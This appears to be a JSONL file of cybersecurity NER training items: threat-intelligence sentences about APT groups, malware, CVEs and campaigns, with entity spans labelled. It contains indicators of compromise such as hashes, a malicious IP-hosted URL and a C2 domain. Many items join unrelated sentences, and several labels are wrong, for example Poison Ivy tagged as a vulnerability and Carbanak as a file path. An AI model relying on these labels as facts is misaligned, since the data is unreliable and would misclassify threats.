{"text": "The main purpose of this module is to exfiltrate Skype call recordings . In mid-September , an app named ‘Network Speed Master’ stood out on our radar with its rather unusual behavior patterns . Leviathan : TEMP.Jumper , APT40 , TEMP.Periscope .", "spans": {"SYSTEM: Skype": [[49, 54]], "THREAT_ACTOR: ‘Network Speed Master’": [[105, 127]], "THREAT_ACTOR: Leviathan": [[195, 204]], "THREAT_ACTOR: TEMP.Jumper": [[207, 218]], "THREAT_ACTOR: APT40": [[221, 226]], "THREAT_ACTOR: TEMP.Periscope": [[229, 243]]}, "info": {"id": "cyberner_stix_train_005278", "source": "cyberner_stix_train"}}
{"text": "The payment portal was initially similar to the one used by Locky and Bart .", "spans": {"MALWARE: Locky": [[60, 65]], "MALWARE: Bart": [[70, 74]]}, "info": {"id": "cyberner_stix_train_005279", "source": "cyberner_stix_train"}}
{"text": "SHA256 : 905f6a62749ca6f0fd33345d6a8b1831d87e9fd1f81a59cd3add82643b367693 .", "spans": {"FILEPATH: 905f6a62749ca6f0fd33345d6a8b1831d87e9fd1f81a59cd3add82643b367693": [[9, 73]]}, "info": {"id": "cyberner_stix_train_005280", "source": "cyberner_stix_train"}}
{"text": "Botnets can make considerably more money than autonomous Trojans . TAA not only flagged this malicious use of PsExec , it also told us what the attackers were using it for . Since this compilation timestamp dates back two weeks before this campaign , it ’s likely that it has n’t been tampered with by the attackers . An example of these log entries can be found below : By correlating the user , IP address and GUID from the Remote PowerShell HTTP logs to the Exchange frontend , CrowdStrike found a request using the mailbox to the following OWA URL , , corresponding to the IIS log entry below : The backend request for the new exploitation chain is similar to the example shown below : This request seemed to show a novel , previously undocumented , way to reach the PowerShell remoting service through the OWA frontend endpoint , instead of leveraging the endpoint .", "spans": {"ORGANIZATION: TAA": [[67, 70]], "TOOL: PsExec": [[110, 116]]}, "info": {"id": "cyberner_stix_train_005281", "source": "cyberner_stix_train"}}
{"text": "Like the photo displayed in the first decoy file we found , this document references the death of Mazen Fuqaha .", "spans": {}, "info": {"id": "cyberner_stix_train_005282", "source": "cyberner_stix_train"}}
{"text": "PROMETHIUM and NEODYMIUM both used an exploit for CVE-2016-4117 , a vulnerability in Adobe Flash Player that , at the time , was both unknown and unpatched . If the hypothesis is correct and the Turla threat group is using Kazuar , we believe they may be using it as a replacement for Carbon and its derivatives .", "spans": {"THREAT_ACTOR: PROMETHIUM": [[0, 10]], "THREAT_ACTOR: NEODYMIUM": [[15, 24]], "VULNERABILITY: CVE-2016-4117": [[50, 63]], "THREAT_ACTOR: Turla": [[195, 200]], "MALWARE: Kazuar": [[223, 229]], "MALWARE: Carbon": [[285, 291]]}, "info": {"id": "cyberner_stix_train_005283", "source": "cyberner_stix_train"}}
{"text": "http://188.241.58.170/live/owa/office.dotm .", "spans": {"URL: http://188.241.58.170/live/owa/office.dotm": [[0, 42]]}, "info": {"id": "cyberner_stix_train_005284", "source": "cyberner_stix_train"}}
{"text": "In fact , AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers , email clients , messengers , etc , and can act as a keylogger . So far , it appears threat actors have deployed the Bookworm Trojan primarily in attacks on targets in Thailand .", "spans": {"MALWARE: AveMaria": [[10, 18]], "MALWARE: Bookworm Trojan": [[246, 261]]}, "info": {"id": "cyberner_stix_train_005285", "source": "cyberner_stix_train"}}
{"text": "The malicious application da.hao.pao.bin ( Chunghwa Post ) loads a library file libmsy.so used to execute the packed mycode.jar file . Of particular note is their use of tools to identify systems vulnerable to CVE-2017-0144 , which is the same vulnerability exploited by EternalBlue that is best known for its use in the WannaCry attacks of 2017 . Overall , in spite of the lack of sophistication in Gorgon Group 's activity , they were still relatively successful ; once again proving that simple attacks on individuals without proper protections , work .", "spans": {"ORGANIZATION: Chunghwa Post": [[43, 56]], "VULNERABILITY: CVE-2017-0144": [[210, 223]], "THREAT_ACTOR: Gorgon Group": [[400, 412]]}, "info": {"id": "cyberner_stix_train_005286", "source": "cyberner_stix_train"}}
{"text": "Next , the malware enumerates all .exe programs in the % System % folder and looks for an original signed Windows binary that imports from at least one KnownDll and from a library that is not in the KnownDll directory . The connections associated with these profiles indicate the threat actor began using the persona to target organizations in April 2016 . Some of these names include processes related to security software : Ashley Madison ’s long - suspected army of fake female accounts came to the fore in August 2012 after the former sex worker turned activist and blogger Maggie McNeill published screenshots apparently taken from Ashley Madison ’s internal systems suggesting that a large percentage of the female accounts on the service were computer - operated bots .", "spans": {"SYSTEM: Windows": [[106, 113]], "THREAT_ACTOR: threat actor": [[280, 292]], "ORGANIZATION: Ashley Madison": [[426, 440]], "ORGANIZATION: Maggie McNeill": [[578, 592]], "SYSTEM: Ashley Madison ’s internal systems": [[637, 671]], "ORGANIZATION: female accounts": [[714, 729]]}, "info": {"id": "cyberner_stix_train_005287", "source": "cyberner_stix_train"}}
{"text": "Many of these servers are control panels for video surveillance systems developed by the Italian company eSurv , based in Catanzaro , in Calabria , Italy . Taidoor actively sent out malicious documents and maintained several IP addresses for command and control . This is why we chose to name the malware Pierogi , after the popular East European dish . Talos discovered multiple vulnerabilities in Foxit PDF Reader that could allow an adversary to execute , arbitrary code on the targeted machine .", "spans": {"MALWARE: Pierogi": [[305, 312]], "ORGANIZATION: Talos": [[354, 359]], "TOOL: Foxit PDF Reader": [[399, 415]]}, "info": {"id": "cyberner_stix_train_005288", "source": "cyberner_stix_train"}}
{"text": "In the case of this ransomware , using the model would ensure that its ransom note—typically fake police notice or explicit images supposedly found on the device—would appear less contrived and more believable , increasing the chances of the user paying for the ransom . In this report , we present the historical intelligence we have gathered on the Ke3chang campaign , as well as an in-depth assessment of the ongoing Syrian-themed attacks against these MFAs . New patterns and data-flow tracking for opaque predicates . An adversary could potentially instruct a control systems device to perform an action that will cause an Impact", "spans": {"VULNERABILITY: An adversary could potentially instruct a control systems device to perform an action that will cause an Impact": [[523, 634]]}, "info": {"id": "cyberner_stix_train_005289", "source": "cyberner_stix_train"}}
{"text": "Although Poison Ivy has been a proven threat for some time , the delivery mechanism for this backdoor uses recent publicly available techniques that differ from previously observed campaigns .", "spans": {"VULNERABILITY: Poison Ivy": [[9, 19]]}, "info": {"id": "cyberner_stix_train_005290", "source": "cyberner_stix_train"}}
{"text": "If the device does not meet the criteria , it wo n't receive any data , otherwise , it will be redirected to a second server to receive a copy of the malware to install on their device . It is highly likely that this is due to the release of the 2013 FireEye report . OceanLotus : enum.arkoorr.com:8531 11b4 . Open Babel allows users to “ search , convert , analyze , or store data from molecular modeling , chemistry , solid - state materials , biochemistry , or related areas , ” according to its website , and is used in other popular pieces of software in the science field .", "spans": {"ORGANIZATION: FireEye": [[251, 258]], "THREAT_ACTOR: OceanLotus": [[268, 278]], "DOMAIN: enum.arkoorr.com:8531": [[281, 302]], "TOOL: Open Babel": [[310, 320]]}, "info": {"id": "cyberner_stix_train_005291", "source": "cyberner_stix_train"}}
{"text": "Shutdown / restart the computer .", "spans": {}, "info": {"id": "cyberner_stix_train_005292", "source": "cyberner_stix_train"}}
{"text": "The examples below show the plaintext key “ TEST ” to decrypt encoded hexadecimal strings ( jUtils.decrypt ( ) ) . Interestingly , this actor targeted financial entities and companies in one African country , which lead us to think that CopyPaste was associated with cybermercenaries or a training center . Ke3chang attackers are operating within China .", "spans": {"THREAT_ACTOR: actor": [[136, 141]], "ORGANIZATION: financial": [[151, 160]], "THREAT_ACTOR: Ke3chang": [[307, 315]], "THREAT_ACTOR: attackers": [[316, 325]]}, "info": {"id": "cyberner_stix_train_005293", "source": "cyberner_stix_train"}}
{"text": "GeminiDuke and CozyDuke on the other hand appear to have been less used in actual operations , but did undergo much more significant development .", "spans": {"MALWARE: GeminiDuke": [[0, 10]], "MALWARE: CozyDuke": [[15, 23]]}, "info": {"id": "cyberner_stix_train_005294", "source": "cyberner_stix_train"}}
{"text": "'' Package permissions The trojan declares numerous permissions in the manifest , from which we should highlight the BIND_DEVICE_ADMIN , which provides nearly full control of the device to the trojan . The attacker obtains the required privileges and launches a few other tools to modify the access control lists (ACLs) of all websites running on the affected server . While not conclusive by itself , the use of publicly available Iranian hacking tools and popular Iranian hosting companies may be a result of APT33 's familiarity with them and lends support to the assessment that APT33 may be based in Iran .", "spans": {"THREAT_ACTOR: attacker": [[206, 214]], "ORGANIZATION: hosting companies": [[474, 491]], "THREAT_ACTOR: APT33": [[511, 516], [583, 588]]}, "info": {"id": "cyberner_stix_train_005295", "source": "cyberner_stix_train"}}
{"text": "] today shop [ . The name Mofang is based on the Mandarin verb , which means to imitate . Backdoor.APT.Aumlib : In subsequent investigations , we observed malicious files created by w3wp.exe , the process responsible for the Exchange Server web front - end .", "spans": {"THREAT_ACTOR: Mofang": [[26, 32]], "FILEPATH: Backdoor.APT.Aumlib": [[90, 109]], "TOOL: w3wp.exe": [[182, 190]]}, "info": {"id": "cyberner_stix_train_005296", "source": "cyberner_stix_train"}}
{"text": "Germany 's Christian Democratic Union ( CDU ) :", "spans": {"ORGANIZATION: Christian Democratic Union": [[11, 37]], "ORGANIZATION: CDU": [[40, 43]]}, "info": {"id": "cyberner_stix_train_005297", "source": "cyberner_stix_train"}}
{"text": "Wells Fargo Mobile com.whatsapp WhatsApp com.yahoo.mobile.client.android.mail Yahoo Mail – Organized Email fr.banquepopulaire.cyberplus Banque Populaire fr.creditagricole.androidapp Ma Banque jp.co.rakuten_bank.rakutenbank 楽天銀行 -個人のお客様向けアプリ mobi.societegenerale.mobile.lappli L ’ Appli Société Générale net.bnpparibas.mescomptes Mes Comptes BNP Paribas org.telegram.messenger Telegram Triout - Spyware Framework SectorJ04 used the spear phishing email to spread malicious Excel or malicious Word files , and downloaded the MSI files from the attacker’s server when the malicious documents were run . Carbanak is a backdoor used by the attackers to compromise the victim .", "spans": {"SYSTEM: Wells Fargo Mobile": [[0, 18]], "SYSTEM: WhatsApp": [[32, 40]], "SYSTEM: Yahoo Mail": [[78, 88]], "SYSTEM: Banque": [[136, 142]], "SYSTEM: Ma Banque": [[182, 191]], "MALWARE: Triout": [[385, 391]], "THREAT_ACTOR: SectorJ04": [[412, 421]], "THREAT_ACTOR: attacker’s": [[542, 552]], "FILEPATH: Carbanak": [[600, 608]], "MALWARE: backdoor": [[614, 622]], "THREAT_ACTOR: attackers": [[635, 644]]}, "info": {"id": "cyberner_stix_train_005298", "source": "cyberner_stix_train"}}
{"text": "All of these connected domains follow a pattern similar to phishing attacks masquerading as legitimate services – in this case “ online.verify.paypal ” ( 588 ) and “ hmrc.secure.refund ” ( 1021 ) .", "spans": {}, "info": {"id": "cyberner_stix_train_005299", "source": "cyberner_stix_train"}}
{"text": "A search of the name IT Worx brings up a global software professional services organization headquartered in Egypt .", "spans": {"ORGANIZATION: IT Worx": [[21, 28]], "ORGANIZATION: global software professional services organization": [[41, 91]]}, "info": {"id": "cyberner_stix_train_005300", "source": "cyberner_stix_train"}}
{"text": "We would like to emphasize that this method of attack only works on Windows XP and Android versions prior to 2.2 . TClient is actually one of Tropic Trooper 's other backdoors . Even though it ’s probably coincidental , the date within the config corresponds to the date of the first detection of this sample at the corresponding university . CrowdStrike security researchers were working to develop proof - of - concept ( POC ) code for an exploit method indicative of the logging present after recent Play ransomware attacks .", "spans": {"SYSTEM: Windows XP": [[68, 78]], "SYSTEM: Android": [[83, 90]], "TOOL: TClient": [[115, 122]], "ORGANIZATION: CrowdStrike security researchers": [[343, 375]]}, "info": {"id": "cyberner_stix_train_005301", "source": "cyberner_stix_train"}}
{"text": "Multiple factors suggest that this activity is Russian in origin and associated with CNIIHM .", "spans": {"ORGANIZATION: CNIIHM": [[85, 91]]}, "info": {"id": "cyberner_stix_train_005302", "source": "cyberner_stix_train"}}
{"text": "Depending on the intent triggered , one of two Receivers would be called , in this instance they are called Boot or Time but the name is somewhat immaterial . We believe these operations include broadly malicious activity that can enable further operations , such as targeting game source code and compromising digital certificates , while other activities are explicitly financially motivated , such as abusing in-game currency mechanics . Since releasing our 2014 report , we continue to assess that APT28 is sponsored by the Russian government .", "spans": {"TOOL: game source code": [[277, 293]], "TOOL: digital certificates": [[311, 331]], "THREAT_ACTOR: APT28": [[502, 507]], "ORGANIZATION: Russian government": [[528, 546]]}, "info": {"id": "cyberner_stix_train_005303", "source": "cyberner_stix_train"}}
{"text": "Figure 3 . Additionally , the targeting of a French diplomat based in Taipei , Taiwan aligns with previous targeting by these actors , as does the separate infrastructure . The C&C server was not responding during our analysis . A typical web request to the frontend to exploit the SSRF vulnerability on CVE-2022 - 41040 involves some variation of path confusion that references the endpoint as shown below : The backend request for a typical ProxyNotShell exploitation is shown below : Once the PowerShell remoting service can be reached , the second step involves vulnerability CVE-2022 - 41082 being exploited in order to execute arbitrary commands .", "spans": {"ORGANIZATION: French diplomat": [[45, 60]], "THREAT_ACTOR: actors": [[126, 132]], "VULNERABILITY: SSRF vulnerability": [[282, 300]], "VULNERABILITY: CVE-2022 - 41040": [[304, 320]], "VULNERABILITY: ProxyNotShell": [[443, 456]], "VULNERABILITY: PowerShell remoting service": [[496, 523]], "VULNERABILITY: CVE-2022 - 41082": [[580, 596]]}, "info": {"id": "cyberner_stix_train_005304", "source": "cyberner_stix_train"}}
{"text": "Wolf Research claimed to shut down their operations but we clearly see that their previous work continues under another guise . Subdomains at phmail.us have been linked to malicious activity dating back as far as December 2011 . Similarly , the public disclosure of APT12 ’s intrusion at the New York Times also led to only a brief pause in the threat group ’s activity and immediate changes in TTPs . However , the template source code is quite different and the payload delivery uses different infrastructure .", "spans": {"THREAT_ACTOR: APT12": [[266, 271]], "ORGANIZATION: New York Times": [[292, 306]]}, "info": {"id": "cyberner_stix_train_005305", "source": "cyberner_stix_train"}}
{"text": "APT33 's focus on aviation may indicate the group 's desire to gain insight into regional military capabilities to enhance Iran 's aviation capabilities or to support Iran 's military and strategic decision making . One possible hit was triggered when we observed Mevade , an unusual piece of malware that appeared late in 2013 .", "spans": {"THREAT_ACTOR: APT33": [[0, 5]], "ORGANIZATION: aviation": [[18, 26]], "ORGANIZATION: military": [[90, 98], [175, 183]]}, "info": {"id": "cyberner_stix_train_005306", "source": "cyberner_stix_train"}}
{"text": "However , their strategy , tactics , techniques , and procedures in this particular attack emphasize the importance of rigorous patching regimens for all organizations .", "spans": {}, "info": {"id": "cyberner_stix_train_005307", "source": "cyberner_stix_train"}}
{"text": "The downloaded file is an archive file ( .r23 ) , that contains a Windows executable file with the same name as the PDF and with a fake Microsoft Word icon .", "spans": {"FILEPATH: .r23": [[41, 45]], "SYSTEM: Windows": [[66, 73]], "TOOL: PDF": [[116, 119]], "ORGANIZATION: Microsoft": [[136, 145]], "TOOL: Word": [[146, 150]]}, "info": {"id": "cyberner_stix_train_005308", "source": "cyberner_stix_train"}}
{"text": "] top/ Oct 23 , 2017 hxxp : //online.bankaustria.at.id8817465 [ . Captured legitimate user credentials when users interacted with these actor - controlled servers . PittyTiger is a threat group believed to operate out of China that uses multiple different types of malware to maintain command and control .", "spans": {"THREAT_ACTOR: actor": [[136, 141]], "THREAT_ACTOR: PittyTiger": [[165, 175]]}, "info": {"id": "cyberner_stix_train_005309", "source": "cyberner_stix_train"}}
{"text": "The creators of the Spark backdoor use several techniques to evade detection and stay under the radar .", "spans": {"MALWARE: Spark backdoor": [[20, 34]]}, "info": {"id": "cyberner_stix_train_005310", "source": "cyberner_stix_train"}}
{"text": "It is dropped by at least one of the weaponised documents17 used in the MONSOON campaign where it is embedded inside another executable . Chapter 7 explains the working of Mofang 's preferred tools : ShimRat and SimRatReporter .", "spans": {"TOOL: documents17": [[48, 59]], "MALWARE: ShimRat": [[200, 207]], "MALWARE: SimRatReporter": [[212, 226]]}, "info": {"id": "cyberner_stix_train_005311", "source": "cyberner_stix_train"}}
{"text": "Jaff was not dramatically different from other ransomware strains .", "spans": {"MALWARE: Jaff": [[0, 4]]}, "info": {"id": "cyberner_stix_train_005312", "source": "cyberner_stix_train"}}
{"text": "In addition , just as uncovering new characteristics is important , finding ones we ’ ve also seen in a different malware family like FakeSpy also provides valuable insight . APT28 's malware settings suggest that the developers have done the majority of their work in a Russian language build environment during Russian business hours , which suggests that the Russian government is APT28 's sponsor . Similar to PoisonFrog , the last digit of the received file name determines how the content of the file is . Imagine you got an email that looked like it was from a friend .", "spans": {"MALWARE: FakeSpy": [[134, 141]], "THREAT_ACTOR: APT28": [[175, 180], [384, 389]], "MALWARE: PoisonFrog": [[414, 424]]}, "info": {"id": "cyberner_stix_train_005313", "source": "cyberner_stix_train"}}
{"text": "July 11 Two new Flash zero-day vulnerabilities , CVE-2015-5122 and CVE-2015-5123 , were found in the hacking team dump . The hacking group misused Cobalt Strike , for instance , to perpetrate ATM cyber heists and target financial institutions across Europe , and interestingly , Russia . as the result was not correct in MMAT_CALLS ( detecting call arguments ) CrowdStrike security researchers were working to develop proof - of - concept ( POC ) code for an exploit method indicative of the logging present after recent Play ransomware attacks .", "spans": {"VULNERABILITY: Flash zero-day vulnerabilities": [[16, 46]], "VULNERABILITY: CVE-2015-5122": [[49, 62]], "VULNERABILITY: CVE-2015-5123": [[67, 80]], "THREAT_ACTOR: hacking group": [[125, 138]], "TOOL: Cobalt Strike": [[147, 160]], "THREAT_ACTOR: cyber heists": [[196, 208]], "ORGANIZATION: financial institutions": [[220, 242]], "TOOL: MMAT_CALLS": [[321, 331]], "ORGANIZATION: CrowdStrike security researchers": [[361, 393]]}, "info": {"id": "cyberner_stix_train_005314", "source": "cyberner_stix_train"}}
{"text": "This data structure is 24 bytes and is composed of some fixed fields and a variable portion that depends on the opcode . The Lotus Blossom largely targets military or government , with some cases of higher education and high tech companies . Winnti : dac0bd8972f23c9b5f7f8f06c5d629eac7926269 Tue Nov 27 03:05:16 2018 1729131071 8272c1f4 . According to Kaspersky telemetry , targeted organizations included think tanks and individuals working in various areas related to security and geopolitics .", "spans": {"THREAT_ACTOR: Lotus Blossom": [[125, 138]], "ORGANIZATION: military": [[155, 163]], "ORGANIZATION: government": [[167, 177]], "ORGANIZATION: higher education": [[199, 215]], "ORGANIZATION: high tech companies": [[220, 239]], "THREAT_ACTOR: Winnti": [[242, 248]], "FILEPATH: dac0bd8972f23c9b5f7f8f06c5d629eac7926269": [[251, 291]], "ORGANIZATION: Kaspersky": [[352, 361]], "ORGANIZATION: think tanks": [[406, 417]], "ORGANIZATION: individuals working in various areas related to security and geopolitics": [[422, 494]]}, "info": {"id": "cyberner_stix_train_005315", "source": "cyberner_stix_train"}}
{"text": "The main bot is responsible for persistence , the downloading of additional modules , loading affiliate payloads , and loading updates for the malware .", "spans": {}, "info": {"id": "cyberner_stix_train_005316", "source": "cyberner_stix_train"}}
{"text": "Malware that enslaves devices to form botnets needs to be able to receive updated instructions . In November 2015 , the group started to focus on North American users , mostly in the United States . However , from this it 's only clear that Lazarus might have attacked Polish banks .", "spans": {"THREAT_ACTOR: group": [[120, 125]], "THREAT_ACTOR: Lazarus": [[241, 248]], "ORGANIZATION: banks": [[276, 281]]}, "info": {"id": "cyberner_stix_train_005317", "source": "cyberner_stix_train"}}
{"text": "Mitigations XLoader will not download malicious apps if the Android device uses a mobile data connection . In order to permit their fraudulent withdrawals from ATMs , Lazarus inject a malicious Advanced Interactive eXecutive (AIX) executable into a running , legitimate process on the switch application server of a financial transaction network , in this case a network handling ATM transactions . The peculiarity of this recent attack wave is it actually hit a company not strictly in the Banking or Retail sector , as they recently did , suggesting the threat group could be potentially widening their current operations .", "spans": {"MALWARE: XLoader": [[12, 19]], "THREAT_ACTOR: Lazarus": [[167, 174]], "TOOL: (AIX)": [[225, 230]]}, "info": {"id": "cyberner_stix_train_005318", "source": "cyberner_stix_train"}}
{"text": "Whitefly configures multiple C&C domains for each target . FireEye iSIGHT Intelligence confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims .", "spans": {"THREAT_ACTOR: Whitefly": [[0, 8]], "ORGANIZATION: FireEye iSIGHT Intelligence": [[59, 86]], "THREAT_ACTOR: APT37": [[133, 138]], "VULNERABILITY: zero-day": [[151, 159]], "TOOL: Adobe Flash": [[160, 171]], "VULNERABILITY: CVE-2018-4878": [[188, 201]], "MALWARE: DOGCALL": [[218, 225]], "MALWARE: malware": [[226, 233]]}, "info": {"id": "cyberner_stix_train_005319", "source": "cyberner_stix_train"}}
{"text": "Figure 4 . One of the most notable functions of the initial dropper is to bypass Windows UAC ( User Account Control ) in order to execute the next payload with higher privileges . We were able to obtain four different modules during the investigation . Ransomware - as - a - service is a relatively new version of these commodity groups , such as DarkSide , known for the cyber attack in 2021 that disrupted the Colonial oil pipeline and made gas more expensive for thousands of U.S. consumers .", "spans": {"TOOL: dropper": [[60, 67]], "THREAT_ACTOR: Ransomware - as - a - service": [[253, 282]], "THREAT_ACTOR: DarkSide": [[347, 355]]}, "info": {"id": "cyberner_stix_train_005320", "source": "cyberner_stix_train"}}
{"text": "These 2 techniques have also been previously used by this actor .", "spans": {}, "info": {"id": "cyberner_stix_train_005321", "source": "cyberner_stix_train"}}
{"text": "This blunder made by the company has been frustrating to many developers . TG-3390 's activities indicate a preference for leveraging SWCs and scan-and-exploit techniques to compromise target systems . In November 2019 , we discovered a new campaign run by the Winnti Group against two Hong Kong universities . The discovery of COSMICENERGY illustrates that the barriers to entry for developing offensive OT capabilities are lowering as actors leverage knowledge from prior attacks to develop new malware .", "spans": {"THREAT_ACTOR: Winnti Group": [[261, 273]], "MALWARE: COSMICENERGY": [[328, 340]], "THREAT_ACTOR: actors": [[437, 443]]}, "info": {"id": "cyberner_stix_train_005322", "source": "cyberner_stix_train"}}
{"text": "Figure 9 . In a recent attack , APT33 sent spear-phishing emails to workers in the aviation industry . It’s worth noting that the XOR key is not hardcoded , but instead is read from the first byte of the C:\\Windows\\system.ini file . Based on these findings , CrowdStrike assesses it is highly likely that the OWA technique employed is in fact tied to CVE-2022 - 41080 .", "spans": {"THREAT_ACTOR: APT33": [[32, 37]], "ORGANIZATION: aviation industry": [[83, 100]], "TOOL: XOR": [[130, 133]], "FILEPATH: C:\\Windows\\system.ini": [[204, 225]], "ORGANIZATION: CrowdStrike": [[259, 270]], "VULNERABILITY: CVE-2022 - 41080": [[351, 367]]}, "info": {"id": "cyberner_stix_train_005323", "source": "cyberner_stix_train"}}
{"text": "The macro executes this payload in a rather interesting way by loading the dropped ~temp.docm document and calling a function within its embedded macro to run the payload .", "spans": {"TOOL: macro": [[4, 9]], "FILEPATH: ~temp.docm": [[83, 93]]}, "info": {"id": "cyberner_stix_train_005324", "source": "cyberner_stix_train"}}
{"text": "IOCs SHA256 0ca09d4fde9e00c0987de44ae2ad51a01b3c4c2c11606fe8308a083805760ee7 4378f3680ff070a1316663880f47eba54510beaeb2d897e7bbb8d6b45de63f96 76c9d8226ce558c87c81236a9b95112b83c7b546863e29b88fec4dba5c720c0b 7cc2d8d43093c3767c7c73dc2b4daeb96f70a7c455299e0c7824b4210edd6386 We also believe that both clusters of activity have links to attacks with likely Indian origins , the CONFUCIUS_A attacks are linked to the use of SNEEPY/BYEBYESHELL and the CONFUCIUS_B have a loose link to Hangover . We believe APT40 's emphasis on maritime issues and naval technology ultimately support China 's ambition to establish a blue-water navy .", "spans": {"TOOL: SNEEPY/BYEBYESHELL": [[419, 437]], "MALWARE: CONFUCIUS_B": [[446, 457]], "TOOL: Hangover": [[479, 487]], "THREAT_ACTOR: APT40": [[501, 506]], "ORGANIZATION: naval technology": [[542, 558]]}, "info": {"id": "cyberner_stix_train_005325", "source": "cyberner_stix_train"}}
{"text": "We analyzed the document to determine the reason that the malicious Flash object only ran when the user scrolled to the third page .", "spans": {"TOOL: Flash": [[68, 73]]}, "info": {"id": "cyberner_stix_train_005326", "source": "cyberner_stix_train"}}
{"text": "By comparison , the DataLust ransomware demanded merely $ 15 . Silence 's main targets are located in Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan . Since the beginning of 2019 , we have collected more than 1300 samples and extracted more than 130 C2s . Monitor for contextual data about an account , which may include a username , user ID , environmental data that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"MALWARE: DataLust": [[20, 28]]}, "info": {"id": "cyberner_stix_train_005327", "source": "cyberner_stix_train"}}
{"text": "We observed actors installing webshells to the SharePoint server that they use to run commands and upload additional tools to in order to dump credentials and move laterally to other systems on the network .", "spans": {"TOOL: SharePoint": [[47, 57]]}, "info": {"id": "cyberner_stix_train_005328", "source": "cyberner_stix_train"}}
{"text": "Post-April 2019 : Starting from early 2019 , the new infection rate of “ Agent Smith ” dropped significantly . At first glance CONFUCIUS_B looks very similar to CONFUCIUS_A , and they are also packaged in plain SFX binary files . Dexphot : 65eac7f9b67ff69cefed288f563b4d77917c94c410c6c6c4e4390db66305ca2a . Last week , the Biden administration released its formal roadmap for its national cybersecurity initiative meant to encourage greater investment in cybersecurity and strengthen the U.S. ’s critical infrastructure security ( and more ) .", "spans": {"MALWARE: Agent Smith": [[73, 84]], "MALWARE: CONFUCIUS_B": [[127, 138]], "MALWARE: CONFUCIUS_A": [[161, 172]], "TOOL: SFX binary files": [[211, 227]], "MALWARE: Dexphot": [[230, 237]], "FILEPATH: 65eac7f9b67ff69cefed288f563b4d77917c94c410c6c6c4e4390db66305ca2a": [[240, 304]], "ORGANIZATION: Biden administration": [[323, 343]]}, "info": {"id": "cyberner_stix_train_005329", "source": "cyberner_stix_train"}}
{"text": "In March and April 2018 , Volexity identified multiple spear phishing campaigns attributed to Patchwork , an Indian APT group also known as Dropping Elephant . he Tibetan community has been targeted for over a decade by espionage operations that use malware to infiltrate communications and gather information .", "spans": {"ORGANIZATION: Volexity": [[26, 34]], "THREAT_ACTOR: Patchwork": [[94, 103]], "THREAT_ACTOR: APT group": [[116, 125]], "THREAT_ACTOR: Dropping Elephant": [[140, 157]], "ORGANIZATION: Tibetan community": [[163, 180]], "MALWARE: malware": [[250, 257]]}, "info": {"id": "cyberner_stix_train_005330", "source": "cyberner_stix_train"}}
{"text": "This organization is also working on interception technology . And , finally , with the upcoming Creators Update , Windows Defender ATP will provide additional capabilities for detecting threats such as Winnti , as well as centralized response options , such as machine isolation and file blocking , that will enable fast containment of known attack jump off points . Every IXESHE case we examined revealed that the original infection vector was a targeted email with a PDF exploit as attachment . Compromised websites ( WordPress appears to be the top target ) are injected with a code snippet that replaces the current webpage with the aforementioned fake updates templates .", "spans": {"TOOL: Creators Update": [[97, 112]], "ORGANIZATION: Windows Defender ATP": [[115, 135]], "THREAT_ACTOR: IXESHE": [[374, 380]], "TOOL: email": [[457, 462]], "TOOL: PDF": [[470, 473]], "SYSTEM: Compromised websites": [[498, 518]], "ORGANIZATION: WordPress": [[521, 530]]}, "info": {"id": "cyberner_stix_train_005331", "source": "cyberner_stix_train"}}
{"text": "The diagram below illustrates how we believe the actors behind the Sea Turtle campaign used DNS hijacking to achieve their end goals . Upon decrypting and executing , it drops two additional files wsc_proxy.exe” (legitimate Avast executable) and a malicious DLL wsc.dll” in the %TEMP% folder .", "spans": {"MALWARE: Sea Turtle": [[67, 77]], "FILEPATH: wsc_proxy.exe”": [[197, 211]], "TOOL: DLL": [[258, 261]], "FILEPATH: wsc.dll”": [[262, 270]]}, "info": {"id": "cyberner_stix_train_005332", "source": "cyberner_stix_train"}}
{"text": "The report specifies the Magic Hound targeted political , military and defense industry in the US , UK and Israel . The link to the final payload of KerrDown was still active during the time of analysis and hence we were able to download a copy which turned out to be a variant of Cobalt Strike Beacon .", "spans": {"ORGANIZATION: political , military and defense industry": [[46, 87]], "FILEPATH: KerrDown": [[149, 157]]}, "info": {"id": "cyberner_stix_train_005333", "source": "cyberner_stix_train"}}
{"text": "The dark ways of the Triada Once downloaded and installed , the Triada Trojan first tries to collect some information about the system — like the device model , the OS version , the amount of the SD card space , the list of the installed applications and other things . Operation Daybreak appears to have been launched by ScarCruft in March 2016 and employs a previously unknown ( 0-day ) Adobe Flash Player exploit . Over the course of the attack campaign , we have observed two different variations of the Helminth backdoor , one written in VBScript and PowerShell that was delivered via a macro within Excel spreadsheets and the other a standalone Windows executable .", "spans": {"MALWARE: Triada": [[21, 27], [64, 70]], "VULNERABILITY: 0-day": [[381, 386]], "VULNERABILITY: Adobe Flash Player exploit": [[389, 415]], "MALWARE: Helminth backdoor": [[508, 525]], "TOOL: PowerShell": [[556, 566]]}, "info": {"id": "cyberner_stix_train_005334", "source": "cyberner_stix_train"}}
{"text": "FinFisher is not afraid of using all kinds of tricks , ranging from junk instructions and “ spaghetti code ” to multiple layers of virtual machines and several known and lesser-known anti-debug and defensive measures . The group 's capabilities are more than the much discussed CVE-2012-0158 exploits over the past few years . This simple backdoor has only four commands that can be used by the attacker : In the listed indicators of compromise , we noticed domains that we had seen used in a distinct skimming campaign which did n't seem to be documented yet .", "spans": {"MALWARE: FinFisher": [[0, 9]], "THREAT_ACTOR: group": [[223, 228]], "VULNERABILITY: CVE-2012-0158": [[278, 291]]}, "info": {"id": "cyberner_stix_train_005335", "source": "cyberner_stix_train"}}
